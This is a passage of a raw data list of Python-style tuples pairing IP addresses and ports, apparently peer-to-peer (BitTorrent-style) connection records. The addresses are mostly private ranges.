('192.168.3.116:25512', '192.168.3.11:27645'),
('1.64.65.66:25512', '172.16.31.10:11650'),
('192.168.3.116:25512', '192.168.127.12:26248'),
('1.64.65.66:25512', '192.168.3.11:51666'),
('172.16.31.10:50321', '172.16.58.3:49328'),
('172.16.31.10:50321', '192.168.127.12:57685'),
('172.16.31.10:50321', '192.168.3.11:54479'),
('172.16.31.10:50321', '46.181.213.99:10101'),
('172.16.31.10:50321', '172.16.31.10:57848'),
('172.16.31.10:50321', '172.16.31.10:50321'),
('172.16.31.10:50321', '172.16.31.10:8999'),
('172.16.31.10:50321', '172.16.58.3:53313'),
('172.16.17.32:46777', '192.168.3.11:41442'),
('172.16.17.32:46777', '172.16.58.3:39619'),
('172.16.17.32:46777', '172.16.17.32:18039'),
('172.16.17.32:46777', '172.16.17.32:6889'),
('172.16.17.32:46777', '172.16.17.32:3074'),
('172.16.17.32:46777', '192.168.3.11:11948'),
('172.16.17.32:46777', '172.16.17.32:6881'),
('172.16.17.32:46777', '172.16.58.3:31861'),
('172.16.17.32:51753', '172.16.31.10:58877'),
('172.16.17.32:51753', '172.16.17.32:6944'),
('172.16.17.32:51753', '172.16.17.32:51413'),
('172.16.17.32:51753', '172.16.17.32:54570'),
('172.16.17.32:51753', '172.16.17.32:52955'),
('172.16.17.32:51753', '172.16.31.10:8999'),
('172.16.17.32:51753', '172.16.31.10:26430'),
('172.16.17.32:51753', '172.16.17.32:56474'),
('192.168.127.12:26085', '192.168.3.11:34225'),
('192.168.127.12:26085', '192.168.127.12:48169'),
('192.168.127.12:26085', '172.16.58.3:25299'),
('192.168.127.12:26085', '192.168.127.12:51413'),
('192.168.127.12:26085', '192.168.3.11:6881'),
('192.168.127.12:26085', '172.16.58.3:50321'),
('192.168.127.12:26085', '192.168.127.12:28830'),
('192.168.127.12:26085', '192.168.3.11:51413'),
('192.168.127.12:63684', '172.16.17.32:6881'),
('192.168.127.12:63684', '192.168.127.12:51413'),
('192.168.127.12:63684', '192.168.127.12:48095'),
('192.168.127.12:63684', '172.16.58.3:6881'),
('192.168.127.12:63684', '172.16.58.3:45688'),
('192.168.127.12:63684', '172.16.58.3:25790'),
('192.168.127.12:63684', '172.16.31.10:31875'),
('192.168.127.12:63684', '172.16.31.10:50759'),
('192.168.127.12:39030', '172.16.17.32:40924'),
('192.168.127.12:39030', '192.168.3.11:1626'),
('192.168.127.12:39030', '172.16.31.10:10471'),
('192.168.127.12:39030', '192.168.3.11:5555'),
('192.168.127.12:39030', '172.16.17.32:52662'),
('192.168.127.12:39030', '172.16.31.10:37750'),
('192.168.127.12:39030', '192.168.3.11:64929'),
('192.168.127.12:39030', '172.16.31.10:17317'),
('192.168.3.11:6881', '192.168.3.11:6339'),
('192.168.3.11:6881', '192.168.3.11:6339'),
('192.168.3.11:6881', '172.16.58.3:45741'),
('192.168.3.11:6881', '172.16.58.3:27336'),
('192.168.3.11:6881', '192.168.3.11:6881'),
('192.168.3.11:6881', '172.16.17.32:6881'),
('192.168.3.11:6881', '172.16.58.3:51422'),
('192.168.3.11:6881', '172.16.17.32:60040'),
('172.16.58.3:22889', '192.168.3.11:29979'),
('172.16.58.3:22889', '192.168.127.12:10798'),
('172.16.58.3:22889', '192.168.3.11:50321'),
('172.16.58.3:22889', '172.16.17.32:51703'),
('172.16.58.3:22889', '172.16.58.3:6883'),
('172.16.58.3:22889', '172.16.58.3:6881'),
('172.16.58.3:22889', '172.16.31.10:46936'),
('172.16.58.3:22889', '172.16.17.32:47085'),
('172.16.58.3:22889', '172.16.31.10:11488'),
('172.16.58.3:22889', '192.168.3.11:50321'),
('172.16.58.3:22889', '172.16.31.10:3181'),
('172.16.58.3:22889', '172.16.58.3:8621'),
('172.16.58.3:22889', '192.168.3.11:42423'),
('172.16.58.3:22889', '192.168.127.12:11278'),
('172.16.58.3:22889', '172.16.17.32:6889'),
('172.16.58.3:22889', '172.16.31.10:12962'),
('172.16.17.32:49001', '192.168.3.11:63330'),
('172.16.17.32:49001', '172.16.17.32:31360'),
('172.16.17.32:49001', '172.16.58.3:35423'),
('172.16.17.32:49001', '192.168.127.12:59121'),
('172.16.17.32:49001', '172.16.31.10:57975'),
('172.16.17.32:49001', '192.168.127.12:19318'),
('172.16.17.32:49001', '192.168.3.11:55178'),
('172.16.17.32:49001', '172.16.31.10:12462'),
('172.16.17.32:16037', '192.168.127.12:49481'),
('172.16.17.32:16037', '172.16.31.10:6933'),
('172.16.17.32:16037', '172.16.31.10:51516'),
('172.16.17.32:16037', '172.16.58.3:49869'),
('172.16.17.32:16037', '172.16.17.32:6922'),
('172.16.17.32:16037', '172.16.58.3:25679'),
('172.16.17.32:16037', '172.16.58.3:46891'),
('172.16.17.32:16037', '192.168.3.11:51413'),
('192.168.127.12:18089', '192.168.3.11:58745'),
('192.168.127.12:18089', '172.16.17.32:63812'),
('192.168.127.12:18089', '172.16.17.32:6881'),
('192.168.127.12:18089', '172.16.31.10:61425'),
('192.168.127.12:18089', '192.168.3.11:49659'),
('192.168.127.12:18089', '192.168.127.12:37933'),
('192.168.127.12:18089', '172.16.58.3:6881'),
('192.168.127.12:18089', '172.16.58.3:50500'),
('192.168.3.11:6999', '172.16.17.32:6881'),
('192.168.3.11:6999', '172.16.31.10:6966'),
('192.168.3.11:6999', '172.16.17.32:55629'),
('192.168.3.11:6999', '172.16.31.10:51413'),
('192.168.3.11:6999', '172.16.31.10:27906'),
('192.168.3.11:6999', '172.16.31.10:27974'),
('192.168.3.11:6999', '172.16.58.3:57973'),
('192.168.3.11:6999', '172.16.31.10:8999'),
('192.168.3.11:6881', '192.168.3.11:51413'),
('192.168.3.11:6881', '172.16.31.10:55746'),
('192.168.3.11:6881', '172.16.17.32:11049'),
('192.168.3.11:6881', '192.168.3.11:6881'),
('192.168.3.11:6881', '172.16.17.32:51413'),
('192.168.3.11:6881', '172.16.31.10:51413'),
('192.168.3.11:6881', '172.16.17.32:38874'),
('192.168.3.11:6881', '172.16.17.32:46275'),
('192.168.127.12:49481', '172.16.17.32:51413'),
('192.168.127.12:49481', '192.168.127.12:51504'),
('192.168.127.12:49481', '172.16.31.10:51428'),
('192.168.127.12:49481', '172.16.17.32:51488'),
('192.168.127.12:49481', '172.16.31.10:6889'),
('192.168.127.12:49481', '172.16.58.3:50321'),
('192.168.127.12:49481', '172.16.58.3:6882'),
('192.168.127.12:49481', '192.168.127.12:49165'),
('192.168.127.12:6887', '192.168.3.11:6881'),
('192.168.127.12:6887', '172.16.58.3:6881'),
('192.168.127.12:6887', '172.16.17.32:23298'),
('192.168.127.12:6887', '192.168.3.11:6882'),
('192.168.127.12:6887', '192.168.3.11:6881'),
('192.168.127.12:6887', '192.168.3.11:51413'),
('192.168.127.12:6887', '172.16.17.32:57152'),
('192.168.127.12:6887', '172.16.17.32:12345'),
('172.16.58.3:6889', '172.16.31.10:6881'),
('172.16.58.3:6889', '172.16.31.10:51413'),
('172.16.58.3:6889', '172.16.17.32:51413'),
('172.16.58.3:6889', '172.16.31.10:6966'),
('172.16.58.3:6889', '192.168.3.11:6881'),
('172.16.58.3:6889', '172.16.17.32:6881'),
('172.16.58.3:6889', '192.168.3.11:51413'),
('172.16.58.3:6889', '192.168.3.11:34242'),
('172.16.58.3:6889', '172.16.58.3:46891'),
('172.16.58.3:6889', '172.16.31.10:51416'),
('172.16.58.3:6889', '192.168.3.11:6881'),
('172.16.58.3:6889', '192.168.127.12:6889'),
('172.16.58.3:6889', '192.168.127.12:51413'),
('172.16.58.3:6889', '172.16.31.10:51413'),
('172.16.58.3:6889', '192.168.3.11:63938'),
('172.16.58.3:6889', '192.168.3.11:8999'),
('172.16.31.10:8999', '172.16.31.10:8108'),
('172.16.31.10:8999', '172.16.31.10:23704'),
('172.16.31.10:8999', '172.16.17.32:23161'),
('172.16.31.10:8999', '192.168.3.11:25030'),
('172.16.31.10:8999', '192.168.127.12:59620'),
('172.16.31.10:8999', '192.168.3.11:9394'),
('172.16.31.10:8999', '172.16.58.3:31398'),
('172.16.31.10:8999', '172.16.17.32:36473'),
('172.16.31.10:6881', '172.16.17.32:8957'),
('172.16.31.10:6881', '172.16.17.32:14987'),
('172.16.31.10:6881', '172.16.31.10:17367'),
('172.16.31.10:6881', '172.16.58.3:24368'),
('172.16.31.10:6881', '172.16.17.32:27859'),
('172.16.31.10:6881', '172.16.31.10:1045'),
('172.16.31.10:6881', '172.16.58.3:6881'),
('172.16.31.10:6881', '192.168.127.126:64879'),
('172.16.31.10:6881', '192.168.127.12:61221'),
('172.16.31.10:6881', '172.16.31.10:6881'),
('172.16.31.10:6881', '172.16.31.10:6882'),
('172.16.31.10:6881', '172.16.31.10:52548'),
('172.16.31.10:6881', '192.168.3.11:10021'),
('172.16.31.10:6881', '172.16.31.10:10763'),
('172.16.31.10:6881', '192.168.3.11:29701'),
('172.16.31.10:6881', '172.16.58.3:43280'),
('172.16.31.10:6881', '172.16.58.3:58550'),
('172.16.31.10:6881', '192.168.3.11:27971'),
('172.16.31.10:6881', '172.16.31.10:18089'),
('172.16.31.10:6881', '172.16.31.10:57148'),
('172.16.31.10:6881', '192.168.3.11:14036'),
('172.16.31.10:6881', '172.16.17.32:1000'),
('172.16.31.10:6881', '172.16.58.3:6881'),
('172.16.31.10:6881', '192.168.3.11:22586'),
('172.16.31.10:6881', '172.16.31.10:25673'),
('172.16.31.10:6881', '172.16.58.3:35477'),
('172.16.31.10:6881', '172.16.58.3:62348'),
('172.16.31.10:6881', '172.16.31.10:15493'),
('172.16.31.10:6881', '192.168.127.12:62633'),
('172.16.31.10:6881', '172.16.31.10:50321'),
('172.16.31.10:6881', '172.16.58.3:21331'),
('172.16.31.10:6881', '172.16.31.10:6881'),
('172.16.31.10:6881', '172.16.58.3:9921'),
('172.16.31.10:6881', '192.168.127.12:43807'),
('172.16.31.10:6881', '172.16.17.32:12551'),
('172.16.31.10:6881', '192.168.127.12:1055'),
('172.16.31.10:6881', '172.16.17.32:13279'),
('172.16.31.10:6881', '192.168.127.12:20919'),
('172.16.31.10:6881', '192.168.127.12:47004'),
('172.16.31.10:6881', '192.168.127.12:47007'),
('172.16.31.10:6881', '172.16.58.3:47005'),
('172.16.31.10:6881', '172.16.31.10:18768'),
('172.16.31.10:6881', '172.16.58.3:8727'),
('172.16.31.10:6881', '172.16.31.10:27432'),
('172.16.31.10:6881', '172.16.58.3:47266'),
('172.16.31.10:6881', '192.168.3.11:45833'),
('172.16.31.10:6881', '172.16.58.3:4086'),
('172.16.31.10:6881', '192.168.127.12:27032'),
('172.16.31.10:6881', '192.168.127.12:12099'),
('172.16.31.10:6881', '172.16.17.32:26782'),
('172.16.31.10:6881', '192.168.3.11:60029'),
('172.16.31.10:6881', '192.168.127.12:9566'),
('172.16.31.10:6881', '172.16.58.3:50680'),
('172.16.31.10:6881', '192.168.3.11:6339'),
('172.16.31.10:6881', '192.168.3.11:25622'),
('172.16.31.10:6881', '172.16.17.32:27463'),
('172.16.31.10:6881', '172.16.58.3:21009'),
('172.16.31.10:6881', '172.16.17.32:27470'),
('172.16.31.10:6881', '172.16.31.10:15721'),
('172.16.31.10:6881', '172.16.31.10:17562'),
('172.16.31.10:6881', '172.16.58.3:60123'),
('172.16.31.10:6881', '172.16.58.3:25438'),
('172.16.31.10:6881', '172.16.31.10:11112'),
('172.16.31.10:6881', '172.16.17.32:60439'),
('172.16.31.10:6881', '192.168.127.12:13973'),
('172.16.31.10:6881', '172.16.31.10:8888'),
('172.16.31.10:6881', '172.16.17.32:27032'),
('172.16.31.10:6881', '192.168.127.12:36485'),
('172.16.31.10:6881', '192.168.3.11:17109'),
('172.16.31.10:6881', '192.168.127.12:50765'),
('172.16.31.10:6881', '172.16.31.10:7497'),
('172.16.31.10:6881', '192.168.127.12:10137'),
('172.16.31.10:6881', '172.16.17.32:6889'),
('172.16.31.10:6881', '172.16.17.32:41650'),
('172.16.31.10:6881', '172.16.58.3:62797'),
('172.16.31.10:6881', '172.16.31.10:6890'),
('172.16.31.10:6881', '192.168.127.12:1024'),
('172.16.31.10:6881', '172.16.31.10:6881'),
('172.16.31.10:6881', '192.168.3.11:25474'),
('172.16.31.10:6881', '172.16.58.3:40313'),
('172.16.31.10:6881', '172.16.31.10:17514'),
('172.16.31.10:6881', '172.16.58.3:20730'),
('172.16.31.10:6881', '192.168.127.12:14944'),
('172.16.31.10:6881', '192.168.127.12:29289'),
('172.16.31.10:6881', '172.16.17.32:21711'),
('172.16.31.10:6881', '172.16.58.3:20829'),
('172.16.31.10:6881', '172.16.17.32:20970'),
('172.16.31.10:6881', '172.16.58.3:16901'),
('172.16.31.10:6881', '192.168.3.11:8999'),
('172.16.31.10:6881', '172.16.17.32:53475'),
('172.16.31.10:6881', '172.16.58.3:11888'),
('172.16.31.10:6881', '172.16.58.3:6992'),
('172.16.31.10:6881', '192.168.127.12:50321'),
('172.16.31.10:6881', '172.16.58.3:27612'),
('172.16.31.10:6881', '192.168.3.11:15001'),
('172.16.31.10:6881', '172.16.17.32:22028'),
('172.16.31.10:6881', '192.168.127.12:26097'),
('172.16.31.10:6881', '172.16.58.3:47354'),
('172.16.31.10:6881', '172.16.58.3:36711'),
('172.16.31.10:6881', '172.16.31.10:6000'),
('172.16.31.10:6881', '172.16.31.10:6881'),
('172.16.31.10:6881', '192.168.127.12:6881'),
('172.16.31.10:6881', '172.16.17.32:6881'),
('172.16.31.10:6881', '172.16.31.10:6881'),
('172.16.31.10:6881', '192.168.3.11:6881'),
('172.16.31.10:6881', '192.168.127.12:21941'),
('172.16.31.10:6881', '192.168.127.12:32021'),
('172.16.31.10:6881', '192.168.127.12:6881'),
('172.16.31.10:6881', '172.16.31.10:34598'),
('172.16.31.10:6881', '172.16.31.10:45911'),
('172.16.31.10:6881', '192.168.127.12:6881'),
('172.16.31.10:6881', '172.16.58.3:8841'),
('172.16.31.10:6881', '172.16.58.3:50321'),
('172.16.31.10:6881', '172.16.31.10:25226'),
('172.16.31.10:6881', '172.16.58.3:12887'),
('172.16.31.10:6881', '192.168.127.12:6881'),
('172.16.31.10:6881', '192.168.3.11:15594'),
('172.16.31.10:6881', '192.168.127.12:1098'),
('172.16.31.10:6881', '172.16.17.32:21610'),
('172.16.31.10:6881', '172.16.31.10:6889'),
('172.16.31.10:6881', '172.16.58.3:47116'),
('172.16.31.10:6881', '192.168.3.11:1030'),
('172.16.31.10:6881', '192.168.3.11:42465'),
('172.16.31.10:6881', '192.168.127.12:25958'),
('172.16.31.10:6881', '192.168.3.11:20907'),
('172.16.31.10:6881', '172.16.17.32:6881'),
('172.16.31.10:6881', '172.16.17.32:57545'),
('172.16.31.10:6881', '192.168.127.12:20131'),
('172.16.31.10:6881', '192.168.127.12:20151'),
('172.16.31.10:6881', '172.16.58.3:25250'),
('172.16.31.10:6881', '172.16.58.3:27920'),
('172.16.31.10:6881', '172.16.58.3:60388'),
('172.16.31.10:6881', '172.16.58.3:7680'),
('172.16.31.10:6881', '172.16.31.10:32115'),
('172.16.31.10:6881', '172.16.58.3:6882'),
('172.16.31.10:6881', '192.168.3.11:16707'),
('172.16.31.10:6881', '172.16.31.10:36632'),
('172.16.31.10:6881', '172.16.17.32:58202'),
('172.16.31.10:6881', '172.16.31.10:6881'),
('172.16.31.10:6881', '172.16.17.32:2137'),
('172.16.31.10:6881', '172.16.31.10:8999'),
('172.16.31.10:6881', '192.168.127.12:40339'),
('172.16.31.10:6881', '192.168.3.11:6881'),
('172.16.31.10:6881', '172.16.31.10:6935'),
('172.16.31.10:6881', '172.16.31.10:6938'),
('172.16.31.10:6881', '172.16.58.3:6881'),
('172.16.31.10:6881', '192.168.127.12:6884'),
('172.16.31.10:6881', '172.16.17.32:54805'),
('172.16.31.10:6881', '192.168.3.11:50242'),
('172.16.31.10:6881', '192.168.3.11:60909'),
('172.16.31.10:6881', '172.16.17.32:44728'),
('172.16.31.10:6881', '172.16.31.10:48818'),
('172.16.31.10:6881', '192.168.3.11:54854'),
('172.16.31.10:6881', '192.168.127.12:54208'),
('172.16.31.10:6881', '172.16.17.32:6881'),
('172.16.31.10:6881', '192.168.3.11:25123'),
('172.16.31.10:6881', '192.168.3.11:7978'),
('172.16.31.10:6881', '172.16.58.3:20879'),
('172.16.31.10:6881', '192.168.3.11:38448'),
('172.16.31.10:6881', '192.168.127.12:24355'),
('172.16.31.10:6881', '172.16.17.32:61097'),
('172.16.31.10:6881', '172.16.17.32:13056'),
('172.16.31.10:6881', '172.16.17.32:47359'),
('172.16.31.10:6881', '172.16.17.32:62412'),
('172.16.31.10:6881', '192.168.3.11:6881'),
('172.16.31.10:6881', '192.168.3.11:19217'),
('172.16.31.10:6881', '172.16.17.32:49001'),
('172.16.31.10:6881', '192.168.127.12:19364'),
('172.16.31.10:6881', '192.168.127.12:20665'),
('172.16.31.10:6881', '192.168.127.12:23639'),
('172.16.31.10:6881', '192.168.127.12:26940'),
('172.16.31.10:6881', '192.168.127.12:30809'),
('172.16.31.10:6881', '172.16.31.10:47783'),
('172.16.31.10:6881', '192.168.3.11:51413'),
('172.16.31.10:6881', '172.16.31.10:6882'),
('172.16.31.10:6881', '172.16.31.10:6884'),
('172.16.31.10:6881', '172.16.31.10:6885'),
('172.16.31.10:6881', '172.16.31.10:6881'),
('172.16.31.10:6881', '192.168.3.11:6881'),
('172.16.31.10:6881', '192.168.3.11:51413'),
('172.16.31.10:6881', '192.168.127.12:24554'),
('172.16.31.10:6881', '192.168.127.12:14855'),
('172.16.31.10:6881', '192.168.3.11:3292'),
('172.16.31.10:6881', '192.168.3.11:64494'),
('172.16.31.10:6881', '192.168.127.12:59679'),
('172.16.31.10:6881', '172.16.17.32:13533'),
('172.16.31.10:6881', '172.16.17.32:22866'),
('172.16.31.10:6881', '172.16.17.32:24688'),
('172.16.31.10:6881', '172.16.17.32:31038'),
('172.16.31.10:6881', '172.16.17.32:32976'),
('172.16.31.10:6881', '172.16.17.32:35267'),
('172.16.31.10:6881', '172.16.17.32:36818'),
('172.16.31.10:6881', '172.16.17.32:38249'),
('172.16.31.10:6881', '172.16.17.32:40308'),
('172.16.31.10:6881', '172.16.17.32:46729'),
('172.16.31.10:6881', '172.16.17.32:52255'),
('172.16.31.10:6881', '172.16.17.32:54232'),
('172.16.31.10:6881', '172.16.17.32:6069'),
('172.16.31.10:6881', '172.16.17.32:61639'),
('172.16.31.10:6881', '172.16.17.32:63814'),
('172.16.31.10:6881', '172.16.58.3:6881'),
('172.16.31.10:6881', '172.16.17.32:61963'),
('172.16.31.10:6881', '172.16.58.3:7449'),
('172.16.31.10:6881', '172.16.31.10:26952'),
('172.16.31.10:6881', '192.168.3.11:6881'),
('172.16.31.10:6881', '192.168.3.11:22042'),
('172.16.31.10:6881', '172.16.17.32:20345'),
('172.16.31.10:6881', '172.16.17.32:6892'),
('172.16.31.10:6881', '172.16.17.32:6992'),
('172.16.31.10:6881', '172.16.58.3:26021'),
('172.16.31.10:6881', '192.168.3.11:35403'),
('172.16.31.10:6881', '192.168.3.11:9721'),
('172.16.31.10:6881', '172.16.31.10:28327'),
('172.16.31.10:6881', '192.168.127.12:51413'),
('172.16.31.10:6881', '172.16.58.3:38208'),
('172.16.31.10:6881', '172.16.58.3:26845'),
('172.16.31.10:6881', '172.16.58.3:54589'),
('172.16.31.10:6881', '172.16.58.3:6881'),
('172.16.31.10:6881', '172.16.31.10:4432'),
('172.16.31.10:6881', '172.16.31.10:4432'),
('172.16.31.10:6881', '172.16.58.3:9849'),
('172.16.31.10:6881', '172.16.17.32:50321'),
('172.16.31.10:6881', '192.168.127.12:6881'),
('172.16.31.10:6881', '172.16.58.3:11319'),
('172.16.31.10:6881', '192.168.3.11:6881'),
('172.16.31.10:6881', '192.168.127.12:6881'),
('172.16.31.10:6881', '172.16.31.10:6881'),
('172.16.31.10:6881', '172.16.17.32:13310'),
('172.16.31.10:6881', '172.16.31.10:6881'),
('172.16.31.10:6881', '192.168.127.12:6881'),
('172.16.31.10:6881', '192.168.127.12:10241'),
('172.16.31.10:6881', '172.16.31.10:18359'),
('172.16.31.10:6881', '172.16.17.32:28070'),
('172.16.31.10:6881', '172.16.31.10:17502'),
('172.16.31.10:6881', '172.16.31.10:56459'),
('172.16.31.10:6881', '192.168.127.12:53126'),
('172.16.31.10:6881', '172.16.58.3:27448'),
('172.16.31.10:6881', '172.16.17.32:6881'),
('172.16.31.10:6881', '172.16.31.10:33655'),
('172.16.31.10:6881', '192.168.3.11:46392'),
('172.16.31.10:6881', '192.168.3.11:22089'),
('172.16.31.10:6881', '172.16.58.3:39258'),
('172.16.31.10:6881', '172.16.31.10:47071'),
('172.16.31.10:6881', '192.168.3.11:22502'),
('172.16.31.10:6881', '192.168.127.12:6881'),
('172.16.31.10:6881', '172.16.58.3:55596'),
('172.16.31.10:6881', '192.168.127.12:50321'),
('172.16.31.10:6881', '172.16.31.10:51413'),
('172.16.31.10:6881', '192.168.127.12:37321'),
('172.16.31.10:6881', '192.168.127.12:62348'),
('172.16.31.10:6881', '172.16.17.32:18446'),
('172.16.31.10:6881', '172.16.31.10:16457'),
('172.16.31.10:6881', '192.168.3.11:1837'),
('172.16.31.10:6881', '172.16.17.32:29966'),
('172.16.31.10:6881', '172.16.58.3:6881'),
('172.16.31.10:6881', '172.16.58.3:6219'),
('172.16.31.10:6881', '172.16.58.3:11354'),
('172.16.31.10:6881', '172.16.58.3:16608'),
('172.16.31.10:6881', '172.16.17.32:6881'),
('172.16.31.10:6881', '172.16.17.32:8621'),
('172.16.31.10:6881', '172.16.58.3:15808'),
('172.16.31.10:6881', '192.168.127.12:6881'),
('172.16.31.10:6881', '192.168.127.12:6881'),
('172.16.31.10:6881', '192.168.3.11:53433'),
('172.16.31.10:6881', '172.16.17.32:1130'),
('172.16.31.10:6881', '192.168.3.11:31561'),
('172.16.31.10:6881', '192.168.3.11:56976'),
('172.16.31.10:6881', '192.168.127.12:6881'),
('172.16.31.10:6881', '172.16.31.10:22181'),
('172.16.31.10:6881', '192.168.3.11:64952'),
('172.16.31.10:6881', '172.16.17.32:13840'),
('172.16.31.10:6881', '172.16.17.32:50714'),
('172.16.31.10:6881', '172.16.17.32:7973'),
('172.16.31.10:6881', '172.16.17.32:8038'),
('172.16.31.10:6881', '172.16.31.10:6881'),
('172.16.31.10:6881', '192.168.127.12:6881'),
('172.16.31.10:6881', '172.16.31.10:6881'),
('172.16.31.10:6881', '172.16.17.32:6881'),
('172.16.31.10:6881', '192.168.3.11:6881'),
('172.16.31.10:6881', '192.168.127.12:7981'),
('172.16.31.10:6881', '192.168.3.11:62560'),
('172.16.31.10:6881', '172.16.17.32:50321'),
('172.16.31.10:6881', '172.16.58.3:9785'),
('172.16.31.10:6881', '172.16.17.32:26559'),
('172.16.31.10:6881', '192.168.3.11:6881'),
('172.16.31.10:6881', '172.16.58.3:6881'),
('172.16.31.10:6881', '172.16.31.10:50321'),
('172.16.31.10:6881', '172.16.17.32:6888'),
('172.16.31.10:6881', '172.16.17.32:33333'),
('172.16.31.10:6881', '172.16.58.3:6881'),
('172.16.31.10:6881', '192.168.3.11:28824'),
('172.16.31.10:6881', '192.168.3.11:60295'),
('172.16.31.10:6881', '172.16.58.3:8652'),
('172.16.31.10:6881', '192.168.3.11:40578'),
('172.16.31.10:6881', '172.16.58.3:13144'),
('172.16.31.10:6881', '172.16.17.32:54769'),
('172.16.31.10:6881', '172.16.58.3:13571'),
('172.16.31.10:6881', '172.16.58.3:3131'),
('172.16.31.10:6881', '172.16.58.3:19847'),
('172.16.31.10:6881', '192.168.3.11:9090'),
('172.16.31.10:6881', '172.16.58.3:1530'),
('172.16.31.10:6881', '192.168.3.11:42825'),
('172.16.31.10:6881', '172.16.58.3:6889'),
('172.16.31.10:6881', '172.16.31.10:16753'),
('172.16.31.10:6881', '172.16.58.3:49869'),
('172.16.31.10:6881', '172.16.58.3:49879'),
('172.16.31.10:6881', '172.16.31.10:3640'),
('172.16.31.10:6881', '192.168.3.11:33123'),
('172.16.31.10:6881', '172.16.17.32:40916'),
('172.16.31.10:6881', '172.16.17.32:60629'),
('172.16.31.10:6881', '172.16.17.32:48577'),
('172.16.31.10:6881', '172.16.58.3:33474'),
('172.16.31.10:6881', '172.16.58.3:3848'),
('172.16.31.10:6881', '192.168.3.11:41161'),
('172.16.31.10:6881', '172.16.17.32:29021'),
('172.16.31.10:6881', '172.16.58.3:6881'),
('172.16.31.10:6881', '172.16.17.32:60052'),
('172.16.31.10:6881', '172.16.31.10:10391'),
('172.16.31.10:6881', '192.168.127.12:45620'),
('172.16.31.10:6881', '192.168.3.11:48791'),
('172.16.31.10:6881', '172.16.31.10:6889'),
('172.16.31.10:6881', '172.16.58.3:57688'),
('172.16.31.10:6881', '192.168.127.12:41074'),
('172.16.31.10:6881', '192.168.127.12:40971'),
('172.16.31.10:6881', '172.16.31.10:23022'),
('172.16.31.10:6881', '192.168.3.11:12052'),
('172.16.31.10:6881', '192.168.3.11:40795'),
('172.16.31.10:6881', '172.16.58.3:59435'),
('172.16.31.10:6881', '172.16.58.3:10294'),
('172.16.31.10:6881', '172.16.31.10:6881'),
('172.16.31.10:6881', '192.168.127.12:50321'),
('172.16.31.10:6881', '172.16.58.3:11295'),
('172.16.31.10:6881', '192.168.3.11:3331'),
('172.16.31.10:6881', '192.168.127.12:6894'),
('172.16.31.10:6881', '172.16.17.32:30368'),
('172.16.31.10:6881', '192.168.3.11:6881'),
('172.16.31.10:6881', '192.168.127.12:63489'),
('172.16.31.10:6881', '172.16.31.10:6892'),
('172.16.31.10:6881', '172.16.31.10:6992'),
('172.16.31.10:6881', '192.168.127.12:9500'),
('172.16.31.10:6881', '192.168.127.12:6881'),
('172.16.31.10:6881', '192.168.127.12:16872'),
('172.16.31.10:6881', '192.168.127.12:15057'),
('172.16.31.10:6881', '172.16.31.10:28835'),
('172.16.31.10:6881', '172.16.31.10:50701'),
('172.16.31.10:6881', '192.168.3.11:1131'),
('172.16.31.10:6881', '192.168.127.12:9610'),
('172.16.31.10:6881', '192.168.3.11:25026'),
('172.16.31.10:6881', '172.16.31.10:51413'),
('172.16.31.10:6881', '192.168.127.12:15064'),
('172.16.31.10:6881', '172.16.17.32:51413'),
('172.16.31.10:6881', '192.168.127.12:34407'),
('172.16.31.10:6881', '172.16.17.32:61609'),
('172.16.31.10:6881', '172.16.58.3:7293'),
('172.16.31.10:6881', '172.16.31.10:52256'),
('172.16.31.10:6881', '172.16.17.32:19993'),
('172.16.31.10:6881', '192.168.3.11:45319'),
('172.16.31.10:6881', '172.16.17.32:49063'),
('172.16.31.10:6881', '192.168.3.11:45834'),
('172.16.31.10:6881', '192.168.3.11:52607'),
('172.16.31.10:6881', '192.168.127.12:46441'),
('172.16.31.10:6881', '192.168.3.11:44399'),
('172.16.31.10:6881', '172.16.17.32:17968'),
('172.16.31.10:6881', '192.168.3.11:43849'),
('172.16.31.10:6881', '172.16.17.32:6881'),
('172.16.31.10:6881', '192.168.3.11:47778'),
('172.16.31.10:6881', '172.16.17.32:6881'),
('172.16.31.10:6881', '192.168.127.12:51442'),
('172.16.31.10:6881', '192.168.127.12:41454'),
('172.16.31.10:6881', '172.16.31.10:50321'),
('172.16.31.10:6881', '172.16.58.3:44822'),
('172.16.31.10:6881', '172.16.31.10:61687'),
('172.16.31.10:6881', '192.168.3.11:6881'),
('172.16.31.10:6881', '192.168.3.11:44137'),
('172.16.31.10:6881', '172.16.17.32:57053'),
('172.16.31.10:6881', '172.16.17.32:60680'),
('172.16.31.10:6881', '192.168.3.11:6889'),
('172.16.31.10:6881', '172.16.58.3:6881'),
('172.16.31.10:6881', '172.16.17.32:9090'),
('172.16.31.10:6881', '172.16.17.32:9091'),
('172.16.31.10:6881', '172.16.58.3:57120'),
('172.16.31.10:6881', '192.168.3.11:7777'),
('172.16.31.10:6881', '192.168.3.11:8887'),
('172.16.31.10:6881', '192.168.3.11:8888'),
('172.16.31.10:6881', '172.16.17.32:7776'),
('172.16.31.10:6881', '172.16.17.32:8887'),
('172.16.31.10:6881', '172.16.17.32:9999'),
('172.16.31.10:6881', '172.16.31.10:7777'),
('172.16.31.10:6881', '172.16.31.10:8888'),
('172.16.31.10:6881', '172.16.31.10:9999'),
('172.16.31.10:6881', '192.168.3.11:22378'),
('172.16.31.10:6881', '172.16.31.10:9051'),
('172.16.31.10:6881', '192.168.127.12:13840'),
('172.16.31.10:6881', '192.168.127.12:31386'),
('172.16.31.10:6881', '192.168.127.12:51465'),
('172.16.31.10:6881', '192.168.3.11:14835'),
('172.16.31.10:6881', '192.168.127.12:7788'),
('172.16.31.10:6881', '192.168.127.12:60659'),
('172.16.31.10:6881', '192.168.3.11:51553'),
('172.16.31.10:6881', '192.168.127.12:50321'),
('172.16.31.10:6881', '172.16.17.32:13247'),
('172.16.31.10:6881', '192.168.127.12:6889'),
('172.16.31.10:6881', '172.16.58.3:64879'),
('172.16.31.10:6881', '172.16.58.3:6892'),
('172.16.31.10:6881', '172.16.31.10:6892'),
('172.16.31.10:6881', '172.16.31.10:6992'),
('172.16.31.10:6881', '192.168.127.12:12766'),
('172.16.31.10:6881', '192.168.127.12:22046'),
('172.16.31.10:6881', '192.168.127.12:23291'),
('172.16.31.10:6881', '192.168.127.12:31528'),
('172.16.31.10:6881', '192.168.127.12:32188'),
('172.16.31.10:6881', '172.16.31.10:6881'),
('172.16.31.10:6881', '192.168.127.12:28007'),
('172.16.31.10:6881', '172.16.31.10:6892'),
('172.16.31.10:6881', '172.16.31.10:6992'),
('172.16.31.10:6881', '192.168.127.12:29472'),
('172.16.31.10:6881', '172.16.17.32:11746'),
('172.16.31.10:6881', '192.168.127.12:27702'),
('172.16.31.10:6881', '172.16.31.10:6881'),
('172.16.31.10:6881', '172.16.17.32:26748'),
